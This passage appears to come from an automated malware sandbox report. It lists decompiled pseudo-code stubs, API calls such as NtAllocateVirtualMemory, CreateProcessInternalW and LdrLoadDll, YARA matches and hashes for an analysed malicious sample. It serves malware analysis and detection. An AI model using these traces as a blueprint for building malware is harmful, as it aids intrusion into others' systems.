                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread

                                                          C-Code - Quality: 53%
                                                          			E004184C3(void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                          				void* _v117;
                                                          				char _t12;
                                                          				void* _t19;
                                                          
                                                          				asm("aas");
                                                          				asm("repne aad 0xa9");
                                                          				asm("in eax, dx");
                                                          				_t9 = _a4;
                                                          				_t5 = _t9 + 0xc74; // 0xc74
                                                          				L00418DC0(_t19, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                          				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                          				return _t12;
                                                          			}







                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap

                                                          C-Code - Quality: 100%
                                                          			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                          				char _t10;
                                                          				void* _t15;
                                                          
                                                          				_t3 = _a4 + 0xc74; // 0xc74
                                                          				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                          				return _t10;
                                                          			}






                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap

                                                          C-Code - Quality: 100%
                                                          			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                          				void* _t10;
                                                          				void* _t15;
                                                          
                                                          				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                          				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                          				return _t10;
                                                          			}






                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap

                                                          C-Code - Quality: 100%
                                                          			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                          				int _t10;
                                                          				void* _t15;
                                                          
                                                          				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                          				return _t10;
                                                          			}






                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00418510(intOrPtr _a4, int _a8) {
                                                          				void* _t10;
                                                          
                                                          				_t5 = _a4;
                                                          				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                          				ExitProcess(_a8);
                                                          			}





                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 6543777ceaf0fd68972e27952e81246fdb243592efeac8130102c3b41dfda658
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E00B6FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                          				void* _t7;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t10;
                                                          				intOrPtr* _t12;
                                                          				intOrPtr* _t13;
                                                          				intOrPtr _t14;
                                                          				intOrPtr* _t15;
                                                          
                                                          				_t13 = __edx;
                                                          				_push(_a4);
                                                          				_t14 =  *[fs:0x18];
                                                          				_t15 = _t12;
                                                          				_t7 = E00B1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                          				_push(_t13);
                                                          				E00B65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                          				_t9 =  *_t15;
                                                          				if(_t9 == 0xffffffff) {
                                                          					_t10 = 0;
                                                          				} else {
                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                          				}
                                                          				_push(_t10);
                                                          				_push(_t15);
                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                          				return E00B65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                          			}











                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B6FDFA
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B6FE01
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B6FE2B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 69c6ea198ff6300bb8c8e5819e41eded2961d6c85d6f8154c072d74f2bf52e95
                                                          • Instruction ID: 052a8b7edf803f6685686d94243027dd691b749f5d39ba244ab746988c770325
                                                          • Opcode Fuzzy Hash: 69c6ea198ff6300bb8c8e5819e41eded2961d6c85d6f8154c072d74f2bf52e95
                                                          • Instruction Fuzzy Hash: E4F0C232240601BBD6201A45DC02F73BF9AEB44730F250254F628565E1DA62BC7097A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,030C3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030C3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030C820D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 59e8da1e01e8f4a3e45be5ef3d0bd5a1d2582d96db85c2409dfd24d5fd510d31
                                                          • Instruction ID: 44e1d6013987d1fd270b689c7be013ca08a5e7ee85376b51c110885a7b3c138b
                                                          • Opcode Fuzzy Hash: 59e8da1e01e8f4a3e45be5ef3d0bd5a1d2582d96db85c2409dfd24d5fd510d31
                                                          • Instruction Fuzzy Hash: 4301B2B6241108AFCB18CF98DC95EEB77E9AF8C754F158658FA0DE7240C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,030C3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030C3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030C820D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: 1ed3ddb89b73b9d66e3245ff79adc0da05e1d0b10a966ef6e70b7c5728a1c9a6
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: 42F0B2B2211208ABCB08CF88DC94EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(030C3D30,?,?,030C3D30,00000000,FFFFFFFF), ref: 030C8315
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: d9d201fcfb62367edd8ffb5dbc230c269a0991d1455c7d03308f3ae3c26dbc44
                                                          • Instruction ID: 4096330431afc625ee384893808bfa16045ed022064b2cae2b8b2942b20d0d23
                                                          • Opcode Fuzzy Hash: d9d201fcfb62367edd8ffb5dbc230c269a0991d1455c7d03308f3ae3c26dbc44
                                                          • Instruction Fuzzy Hash: 18F012B6210214ABD714EF98DC80EEB776DEFC8320F148659FA5D9B241D631E915C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(030C3D52,5E972F59,FFFFFFFF,030C3A11,?,?,030C3D52,?,030C3A11,FFFFFFFF,5E972F59,030C3D52,?,00000000), ref: 030C82B5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: 8061083b6d1368ba15c44c978ff9d5a3978ba5e0c2c5cd2ee261118026fac3cd
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: 2BF0A4B6210208ABCB14DF89DC90EEB77ADAF8C754F158648BA1D97241DA30E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(030C3D52,5E972F59,FFFFFFFF,030C3A11,?,?,030C3D52,?,030C3A11,FFFFFFFF,5E972F59,030C3D52,?,00000000), ref: 030C82B5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: d0f7569fab7b448f5a1a463fb8156397a3bb805055009ba2f4a72d62b48a18fb
                                                          • Instruction ID: c004b2f16fbf2e74a09777977994f68b56cc12d11f06f7ac11c6ce52cbb340a2
                                                          • Opcode Fuzzy Hash: d0f7569fab7b448f5a1a463fb8156397a3bb805055009ba2f4a72d62b48a18fb
                                                          • Instruction Fuzzy Hash: 8EF0BDB6200104AFCB14DF89DC90DEB77A9FF8C354F158649FA1D97250D630E911CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030B2D11,00002000,00003000,00000004), ref: 030C83D9
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: 9c3300702e0c8cd102ae85ec9c03e059189a212d1599e13f224bde72baf20adc
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: 6CF015B6210208ABCB14DF89CC80EEB77ADAF88650F118548FE0897241C630F810CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(030C3D30,?,?,030C3D30,00000000,FFFFFFFF), ref: 030C8315
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 9e12772b7c099e74eac4d2aadeb6f345174297289f784f00851a3e7e8cea8814
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: A3D012762003146BD710EF98CC45ED7775CEF44650F154459BA185B241C530F90087E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2075c1f921dd80d5183ecfb6255f7766519db5d8824405e8b1531d64ad56a65f
                                                          • Instruction ID: 74bf67e5e636a3d2115299490600d7d153d2426c4c57614d54c9d3dd1b434500
                                                          • Opcode Fuzzy Hash: 2075c1f921dd80d5183ecfb6255f7766519db5d8824405e8b1531d64ad56a65f
                                                          • Instruction Fuzzy Hash: DF90026121184446F610A5695D14B07004597D5343F51C226A0144554CCA558C617571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5ac4a685f15f7d61946eccf283212a94d93f7e039a3749c64b665142f21e30cd
                                                          • Instruction ID: 30c561ffec953644a9a7581ab83521eb1631b572c0a617e7d7afcc9118741d0e
                                                          • Opcode Fuzzy Hash: 5ac4a685f15f7d61946eccf283212a94d93f7e039a3749c64b665142f21e30cd
                                                          • Instruction Fuzzy Hash: DF9002B120104806F550B1595504746004597D5341F51C122A5054554E87998DD576B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2612af5a86a4028d474e1339020ef72fe82388d558b16e5cc885a50dd99cae80
                                                          • Instruction ID: 7a483ed11d74554206b16c3d0ef4656d2d478ff8492219f8db161f1e6ec10e5c
                                                          • Opcode Fuzzy Hash: 2612af5a86a4028d474e1339020ef72fe82388d558b16e5cc885a50dd99cae80
                                                          • Instruction Fuzzy Hash: 9B9002A134104846F510A1595514B060045D7E6341F51C126E1054554D8759CC527176
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d879e009c3a8c5a221cba575b01c6ce150dde305e1e953728fd2dfc20e3a30ff
                                                          • Instruction ID: c3674d47edf42e848d55bfbea953acb8912f683a3427d82111192e00192157b4
                                                          • Opcode Fuzzy Hash: d879e009c3a8c5a221cba575b01c6ce150dde305e1e953728fd2dfc20e3a30ff
                                                          • Instruction Fuzzy Hash: B390027120104817F521A1595604707004997D5281F91C523A0414558D97968D52B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ec5c437539c1491bfb5e45711facb5d994323a847dbcbf4abb59963b268c042e
                                                          • Instruction ID: 75b911a6644bec3d9569dc433b42a141fc0032aab49636e9405c383c1e8e6726
                                                          • Opcode Fuzzy Hash: ec5c437539c1491bfb5e45711facb5d994323a847dbcbf4abb59963b268c042e
                                                          • Instruction Fuzzy Hash: 34900261242085567955F15955045074046A7E5281791C123A1404950C86669C56F671
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2b765c6d1f258c989cc94564d0fdf8a3c592bded02d7b01938df6217ee6f26a8
                                                          • Instruction ID: 338fa506bc3b3f4d13b815222cbe94b9451cd8d3dc01fdc93d818e63264aca70
                                                          • Opcode Fuzzy Hash: 2b765c6d1f258c989cc94564d0fdf8a3c592bded02d7b01938df6217ee6f26a8
                                                          • Instruction Fuzzy Hash: 4490027120104806F510A5996508646004597E5341F51D122A5014555EC7A58C917171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 030C6F88
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 030C6F88
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030B3B93), ref: 030C84FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030B3B93), ref: 030C84FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030B72BA
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030B72DB
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 030B9B92
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030C8594
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030C8594
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030BCCD0,?,?), ref: 030C704C
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030BCCD0,?,?), ref: 030C704C
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
